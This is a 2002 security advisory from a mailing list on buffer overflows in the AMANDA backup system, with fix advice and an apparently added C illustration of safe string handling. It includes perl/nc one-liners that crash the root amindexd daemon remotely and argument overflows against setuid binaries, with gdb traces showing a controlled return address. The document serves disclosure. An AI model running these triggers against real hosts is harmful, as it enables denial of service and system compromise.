[UNIX] AMANDA Security Issues

From: support@securiteam.com
Date: 05/27/02


The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  AMANDA Security Issues
------------------------------------------------------------------------

SUMMARY

The Advanced Maryland Automatic Network Disk Archiver (AMANDA,
<http://www.amanda.org/>) is a backup system that is available for many
different Unix-based operating systems. Several setuid and setgid binaries
installed by this package contain buffer overflow vulnerabilities that can
be used to execute shellcode with elevated privileges. Additionally, the
amindexd daemon contains a remote overflow bug that can lead to a remote
system compromise.

The affected version of AMANDA is an old package but is often used due to
compatibility problems with newer versions. For example, this package was
until recently shipped with the FreeBSD 4.5 ports collection.

DETAILS

Technical details:
The local overflows are all in files that can only be executed by members
of the operator group. This is a big limitation for anyone trying to abuse
AMANDA locally, as normal users are not members of this group. The big risk
here is the amindexd daemon (10082/TCP), which runs as root and contains
several overflows, two of which can be triggered without any knowledge of
the affected system's configuration.

The amindexd daemon (remote, runs as root)
Long commands sent to this server result in an immediate overflow. This
does not require any knowledge of the affected system's configuration.
Simple replication of this overflow:
perl -e 'print "A" x 260;print "BBBB";' | nc localhost 10082
perl -e 'print "DATE "; print "A" x 260;' | nc localhost 10082

The files listed below are only accessible by users who are members of the
group 'operator'. This is a big limitation for anyone who tries to abuse
them.

The amcheck file (setuid root)
bash-2.05a# /usr/local/bin/amcheck `perl -e 'print "A" x 1000'`
Segmentation fault (core dumped)

(gdb) bt
#0 0x2814c022 in ?? ()
#1 0x280f8c0a in ?? ()
#2 0x804d671 in ?? ()
#3 0x41414141 in ?? ()
Cannot access memory at address 0x41414141.
(gdb)

The amgetidx file (setuid operator)
bash-2.05a# gdb /usr/local/libexec/amanda/amgetidx

(gdb) r `perl -e 'print "A" x 3000'`
Starting program: /usr/local/libexec/amanda/amgetidx `perl -e 'print "A" x
3000'`
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x28144022 in vfprintf () from /usr/lib/libc.so.4
(gdb) bt
#0 0x28144022 in vfprintf () from /usr/lib/libc.so.4
#1 0x280f0c0a in vsprintf () from /usr/lib/libc.so.4
#2 0x804c8dd in getsockname ()
#3 0x41414141 in ?? ()
Error accessing memory address 0x41414141: Bad address.
(gdb)

The amtrmidx file (setuid operator)
bash-2.05a# gdb /usr/local/libexec/amanda/amtrmidx

(gdb) r `perl -e 'print "A" x 3000'`
Starting program: /usr/local/libexec/amanda/amtrmidx `perl -e 'print "A" x
3000'`
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x28141022 in vfprintf () from /usr/lib/libc.so.4
(gdb) bt
#0 0x28141022 in vfprintf () from /usr/lib/libc.so.4
#1 0x280edc0a in vsprintf () from /usr/lib/libc.so.4
#2 0x804b291 in free ()
#3 0x41414141 in ?? ()
Error accessing memory address 0x41414141: Bad address.
(gdb)

The createindex-dump file (setuid operator)
sh-2.05a# gdb /usr/local/libexec/amanda/createindex-dump

(gdb) r `perl -e 'print "A" x 4000'` a a a
Starting program: /usr/local/libexec/amanda/createindex-dump `perl -e
'print "A" x 4000'` a a a
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x2814398c in getenv () from /usr/lib/libc.so.4
(gdb) bt
#0 0x2814398c in getenv () from /usr/lib/libc.so.4
#1 0x28142801 in isatty () from /usr/lib/libc.so.4
#2 0x2814362e in malloc () from /usr/lib/libc.so.4
#3 0x280fbec2 in popen () from /usr/lib/libc.so.4
#4 0x8048874 in atoi ()
#5 0x41414141 in ?? ()
Error accessing memory address 0x41414141: Bad address.
(gdb)

The createindex-gnutar file (setuid operator)
bash-2.05a# gdb /usr/local/libexec/amanda/createindex-gnutar

(gdb) r `perl -e 'print "A" x 4000'` a a a
Starting program: /usr/local/libexec/amanda/createindex-gnutar `perl -e
'print "A" x 4000'` a a a
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x2814398c in getenv () from /usr/lib/libc.so.4
(gdb) bt
#0 0x2814398c in getenv () from /usr/lib/libc.so.4
#1 0x28142801 in isatty () from /usr/lib/libc.so.4
#2 0x2814362e in malloc () from /usr/lib/libc.so.4
#3 0x280fbec2 in popen () from /usr/lib/libc.so.4
#4 0x8048811 in atoi ()
#5 0x41414141 in ?? ()
Error accessing memory address 0x41414141: Bad address.
(gdb)
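The bug class behind both the amindexd overflow and the argv overflows in the backtraces above, as an added C illustration that is not AMANDA's code: an unbounded sprintf into a fixed buffer next to a bounded, checked replacement, plus a length-capped line reader that drops overlong commands before they reach a parser. CMD_MAX, the function names and the sample stream are assumptions, and the reader generalises the single-line PoC to a whole stream of commands.

```c
#include <stdio.h>
#include <string.h>
#define CMD_MAX 256   /* assumed line bound; the PoC above overflows at 260+ bytes */

/* Before: the pattern behind the backtraces above. Untrusted data (argv[1] or a
 * network line) is formatted into a fixed buffer with no length check, so input
 * longer than dst overwrites the saved return address (the 0x41414141 frames). */
void format_unsafe(char *dst /* CMD_MAX bytes */, const char *src) {
    sprintf(dst, "DATE %s", src);   /* overflows once strlen(src) > CMD_MAX - 6 */
}
/* After: bounded formatting plus a check. snprintf never writes past dstlen, and
 * a result >= dstlen means the input did not fit: error, not silent truncation. */
int format_safe(char *dst, size_t dstlen, const char *src) {
    int n = snprintf(dst, dstlen, "DATE %s", src);
    if (n < 0 || (size_t)n >= dstlen) { dst[0] = '\0'; return -1; }
    return 0;
}

/* Length-capped reader for an amindexd-style line protocol. *cursor walks the
 * received bytes (string here, socket in real code); a line of cmdlen-1 bytes or
 * more is dropped whole before parsing. Returns 1 = copied, 0 = dropped, -1 = EOF. */
int read_command(const char **cursor, char *cmd, size_t cmdlen) {
    const char *start = *cursor;
    if (*start == '\0') return -1;
    const char *nl = strchr(start, '\n');
    size_t len = nl ? (size_t)(nl - start) : strlen(start);
    *cursor = nl ? nl + 1 : start + len;    /* consume the line either way */
    if (len >= cmdlen) { cmd[0] = '\0'; return 0; }
    memcpy(cmd, start, len);
    cmd[len] = '\0';
    return 1;
}

/* Constructed sample stream (not captured traffic): a normal command, a 300-byte
 * line like the advisory's PoC, then a command that must still be processed. */
const char *constructed_stream(void) {
    static char stream[CMD_MAX + 400];
    size_t n = (size_t)sprintf(stream, "DATE 2002-05-27\n");
    memset(stream + n, 'A', 300);
    strcpy(stream + n + 300, "\nQUIT\n");
    return stream;
}

int main(void) {
    char cmd[CMD_MAX];
    const char *cur = constructed_stream();
    for (int rc; (rc = read_command(&cur, cmd, sizeof cmd)) != -1; )
        printf("%s: %s\n", rc ? "accepted" : "rejected (overlong)", cmd);
    return 0;
}
```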

Fix information:
Upgrade AMANDA to the latest stable version, which is available from the
developer's web site: <http://www.amanda.org>

As noted earlier, this affects the FreeBSD ports collection that is
shipped with 4.5 or earlier. FreeBSD was contacted and has removed the
vulnerable AMANDA port.

Thanks AMANDA developers and FreeBSD for the fast reaction on this issue.

ADDITIONAL INFORMATION

The information has been provided by zillion <zillion@snosoft.com>.
